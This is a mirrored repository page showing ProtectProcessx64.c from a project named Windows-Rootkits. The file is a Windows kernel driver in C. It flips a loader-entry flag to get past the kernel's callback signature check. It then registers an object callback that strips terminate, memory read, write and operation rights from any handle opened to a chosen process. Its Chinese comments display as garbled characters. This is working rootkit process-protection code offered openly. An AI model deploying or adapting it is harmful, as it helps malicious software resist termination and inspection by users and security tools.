Mirrors/Windows-Rootkits
6
0
Fork 0
mirror of https://github.com/ciyze0101/Windows-Rootkits synced 2024-06-24 07:48:05 +00:00
Code Issues Projects Releases Wiki Activity
94f523ced9
Windows-Rootkits/ProtectProcessx64/ProtectProcessx64.c

164 lines
4.6 KiB
C
Raw Normal View History

Add files via upload
2016-08-29 02:48:57 +00:00
#ifndef CXX_PROTECTPROCESSX64_H
# include "ProtectProcessx64.h"
#endif
PVOID obHandle;//<2F><><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>void*<2A><><EFBFBD>͵ı<CDB5><C4B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ΪObRegisterCallbacks<6B><73><EFBFBD><EFBFBD><EFBFBD>ĵ<EFBFBD>2<EFBFBD><32><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
NTSTATUS
DriverEntry(IN PDRIVER_OBJECT pDriverObj, IN PUNICODE_STRING pRegistryString)
{
NTSTATUS status = STATUS_SUCCESS;
PLDR_DATA_TABLE_ENTRY64 ldr;
pDriverObj->DriverUnload = DriverUnload;
// <20>ƹ<EFBFBD>MmVerifyCallbackFunction<6F><6E>
ldr = (PLDR_DATA_TABLE_ENTRY64)pDriverObj->DriverSection;
ldr->Flags |= 0x20;
ProtectProcess(TRUE);
return STATUS_SUCCESS;
}
NTSTATUS ProtectProcess(BOOLEAN Enable)
{
OB_CALLBACK_REGISTRATION obReg;
OB_OPERATION_REGISTRATION opReg;
memset(&obReg, 0, sizeof(obReg));
obReg.Version = ObGetFilterVersion();
obReg.OperationRegistrationCount = 1;
obReg.RegistrationContext = NULL;
RtlInitUnicodeString(&obReg.Altitude, L"321000");
memset(&opReg, 0, sizeof(opReg)); //<2F><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD><E1B9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//<2F><><EFBFBD><EFBFBD> <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E1B9B9><EFBFBD>ij<EFBFBD>Ա<EFBFBD>ֶε<D6B6><CEB5><EFBFBD><EFBFBD><EFBFBD>
opReg.ObjectType = PsProcessType;
opReg.Operations = OB_OPERATION_HANDLE_CREATE|OB_OPERATION_HANDLE_DUPLICATE;
opReg.PreOperation = (POB_PRE_OPERATION_CALLBACK)&preCall; //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2>һ<EFBFBD><D2BB><EFBFBD>ص<EFBFBD><D8B5><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8>
obReg.OperationRegistration = &opReg; //ע<><D7A2><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
return ObRegisterCallbacks(&obReg, &obHandle); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD>ص<EFBFBD><D8B5><EFBFBD><EFBFBD><EFBFBD>
}
OB_PREOP_CALLBACK_STATUS
preCall(PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION pOperationInformation)
{
HANDLE pid = PsGetProcessId((PEPROCESS)pOperationInformation->Object);
char szProcName[16]={0};
UNREFERENCED_PARAMETER(RegistrationContext);
strcpy(szProcName,GetProcessImageNameByProcessID((ULONG)pid));
if( !_stricmp(szProcName,"calc.exe") )
{
if (pOperationInformation->Operation == OB_OPERATION_HANDLE_CREATE)
{
if ((pOperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_TERMINATE) == PROCESS_TERMINATE)
{
//Terminate the process, such as by calling the user-mode TerminateProcess routine..
pOperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_TERMINATE;
}
if ((pOperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_VM_OPERATION) == PROCESS_VM_OPERATION)
{
//Modify the address space of the process, such as by calling the user-mode WriteProcessMemory and VirtualProtectEx routines.
pOperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_VM_OPERATION;
}
if ((pOperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_VM_READ) == PROCESS_VM_READ)
{
//Read to the address space of the process, such as by calling the user-mode ReadProcessMemory routine.
pOperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_VM_READ;
}
if ((pOperationInformation->Parameters->CreateHandleInformation.OriginalDesiredAccess & PROCESS_VM_WRITE) == PROCESS_VM_WRITE)
{
//Write to the address space of the process, such as by calling the user-mode WriteProcessMemory routine.
pOperationInformation->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_VM_WRITE;
}
}
}
return OB_PREOP_SUCCESS;
}
/*
OpenProcess <EFBFBD><EFBFBD>һֱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ص<EFBFBD><EFBFBD><EFBFBD> ֱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
char*
GetProcessImageNameByProcessID(ULONG ulProcessID)
{
CLIENT_ID Cid;
HANDLE hProcess;
NTSTATUS Status;
OBJECT_ATTRIBUTES oa;
PEPROCESS EProcess = NULL;
Cid.UniqueProcess = (HANDLE)ulProcessID;
Cid.UniqueThread = 0;
InitializeObjectAttributes(&oa,0,0,0,0);
Status = ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oa,&Cid); //hProcess
//ǿ<>򿪽<EFBFBD><F2BFAABD>̻<EFBFBD><CCBB>þ<EFBFBD><C3BE><EFBFBD>
if (!NT_SUCCESS(Status))
{
return FALSE;
}
Status = ObReferenceObjectByHandle(hProcess,FILE_READ_DATA,0,
KernelMode,&EProcess, 0);
//ͨ<><CDA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡEProcess
if (!NT_SUCCESS(Status))
{
ZwClose(hProcess);
return FALSE;
}
ObDereferenceObject(EProcess);
//<2F><><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD>
ZwClose(hProcess);
//ͨ<><CDA8>EProcess<73><73><EFBFBD>ý<EFBFBD><C3BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
return (char*)PsGetProcessImageFileName(EProcess);
}
*/
char*
GetProcessImageNameByProcessID(ULONG ulProcessID)
{
NTSTATUS Status;
PEPROCESS EProcess = NULL;
Status = PsLookupProcessByProcessId((HANDLE)ulProcessID,&EProcess); //hProcess
//ͨ<><CDA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡEProcess
if (!NT_SUCCESS(Status))
{
return FALSE;
}
ObDereferenceObject(EProcess);
//ͨ<><CDA8>EProcess<73><73><EFBFBD>ý<EFBFBD><C3BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
return (char*)PsGetProcessImageFileName(EProcess);
}
VOID
DriverUnload(IN PDRIVER_OBJECT pDriverObj)
{
UNREFERENCED_PARAMETER(pDriverObj);
DbgPrint("driver unloading...\n");
ObUnRegisterCallbacks(obHandle); //obHandle<6C><65><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E6B6A8><EFBFBD><EFBFBD> PVOID obHandle;
}
Reference in New Issue Copy Permalink